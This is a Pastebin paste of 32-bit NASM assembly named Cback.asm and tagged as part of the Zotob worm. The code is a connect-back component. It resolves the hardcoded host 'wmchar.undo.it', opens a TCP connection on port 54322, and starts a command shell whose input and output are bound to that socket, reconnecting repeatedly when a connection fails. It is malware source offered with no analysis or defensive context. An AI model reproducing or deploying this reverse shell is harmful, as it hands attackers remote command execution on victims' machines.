Advertisement
FlyFar

Cback.asm

Jun 6th, 2023
686
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
ASM (NASM) 2.05 KB | Cybersecurity | 0 0
  1. CPU 386
  2. [BITS 32]
  3.  
  4. section .rdata
  5.  
  6. CBACK_HOST  DB  'wmchar.undo.it',0
  7.  
  8.  
  9. section .text execute
  10.  
  11. %xdefine        CBACK_TIMEOUT   ((8*60)*1000)   ;8 min.
  12. %xdefine        CBACK_CHK_CONN  (10*1000)   ;10 sec.
  13. %xdefine        CBACK_PORT  54322
  14.  
  15.  
  16.  
  17. @Cback:
  18.     mov ebp, esp
  19.     sub esp, 0x10
  20.  
  21. %define     _WSASocket  [ebp - 4]
  22.  
  23.     push 0
  24.     push DWORD [MTX_CBACK]
  25.     call WaitForSingleObject
  26.     or eax, eax
  27.     jnz .exit
  28.  
  29.     mov esi, STR_WS2_32
  30.     push esi
  31.     call GetModuleHandle
  32.     or eax, eax
  33.     jnz .ws2
  34.  
  35.     push esi
  36.     call LoadLibrary
  37.     or eax, eax
  38.     jz .exit
  39.  
  40. .ws2
  41.     push STR_WSASocket
  42.     push eax
  43.     call GetProcAddress
  44.     or eax, eax
  45.     jz .exit
  46.  
  47.     mov _WSASocket, eax
  48.  
  49. .gethost
  50.     push CBACK_HOST
  51.     call gethostbyname
  52.     or eax, eax
  53.     jz .exit
  54.  
  55.     mov esi, [eax + 0xC]
  56.     lodsd
  57.     mov eax, [eax]
  58.  
  59.     xor edx, edx
  60.     push edx
  61.     push edx
  62.     push eax        ;ip
  63.     push DWORD (2 | ((((CBACK_PORT << 8) & 0xFF00) | ((CBACK_PORT >> 8) & 0xFF)) << 16)  )
  64.  
  65.     push edx
  66.     push edx
  67.     push edx
  68.     push edx
  69.     push byte 1
  70.     push byte 2
  71.     call DWORD _WSASocket
  72.     xchg ebx, eax
  73.  
  74.     mov edx, esp
  75.     push byte 0x10
  76.     push edx
  77.     push ebx
  78.     call connect
  79.     add esp, byte 0x10
  80.     or eax, eax
  81.     jz .createprocess
  82.  
  83. .retry
  84.     push ebx
  85.     call closesocket
  86.  
  87.     push byte (CBACK_TIMEOUT / CBACK_CHK_CONN)
  88.     pop ecx
  89.  
  90. .sleep
  91.     push ecx
  92.     push CBACK_CHK_CONN
  93.     call Sleep
  94.     pop ecx
  95.     cmp DWORD [CONNECTED], 0
  96.     je .exit
  97.  
  98.     loop .sleep
  99.     jmp short .gethost
  100.  
  101. .exit
  102.     push DWORD [MTX_CBACK]
  103.     call ReleaseMutex
  104.  
  105.     push BYTE 0
  106.     call ExitThread
  107.  
  108.  
  109. .createprocess
  110.     push byte 0x11
  111.     pop ecx
  112.     mov edx, edi
  113.     mov edi, esp
  114.     lea esi, [edi + 0x44]
  115.     push esi
  116.     push edi
  117.  
  118.     push edi
  119.     rep stosd
  120.     pop edi
  121.  
  122.     mov byte [edi], 0x44
  123.     inc byte [edi + 0x2c]   ;STARTF_USESHOWWINDOW
  124.     inc byte [edi + 0x2d]   ;STARTF_USESTDHANDLES
  125.     lea edi, [edi + 0x38]
  126.     mov eax, ebx
  127.     stosd
  128.     stosd
  129.     stosd
  130.     mov edi, edx
  131.     push ecx
  132.     push ecx
  133.     push ecx
  134.     push eax    ;TRUE
  135.     push ecx
  136.     push ecx
  137.     push STR_CMD
  138.     push ecx
  139.     call CreateProcess
  140.  
  141.     lodsd
  142.     push eax
  143.     push byte -1
  144.     push eax
  145.     call WaitForSingleObject
  146.  
  147.     call CloseHandle
  148.     push DWORD [esi]
  149.     call CloseHandle
  150.  
  151.     jmp short .retry
Tags: worm zotob
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement